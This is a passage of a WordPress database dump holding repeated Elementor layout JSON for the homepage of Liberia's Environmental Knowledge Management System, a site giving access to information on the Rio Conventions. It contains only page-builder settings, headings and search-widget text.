:\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"layout\":\"\",\"show_terms\":\"\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"}],\"isInner\":false}],\"isInner\":false}]'),(5691,497,'_elementor_version','2.7.5'),(5692,497,'_elementor_template_type','wp-page'),(5694,87,'_wp_page_template','default'),(5701,501,'_wp_page_template','default'),(5702,501,'_elementor_edit_mode','builder'),(5703,501,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"layout\":\"\",\"show_terms\":\"\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"}],\"isInner\":false}],\"isInner\":false}]'),(5704,501,'_elementor_version','2.7.5'),(5705,501,'_elementor_template_type','wp-page'),(5708,502,'_wp_page_template','default'),(5709,502,'_elementor_edit_mode','builder'),(5710,502,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"}],\"isInner\":false}],\"isInner\":false}]'),(5711,502,'_elementor_version','2.7.5'),(5712,502,'_elementor_template_type','wp-page'),(5716,503,'_wp_page_template','default'),(5717,503,'_elementor_edit_mode','builder'),(5718,503,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"}],\"isInner\":false}],\"isInner\":false}]'),(5719,503,'_elementor_version','2.7.5'),(5720,503,'_elementor_template_type','wp-page'),(5724,504,'_wp_page_template','default'),(5725,504,'_elementor_edit_mode','builder'),(5726,504,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"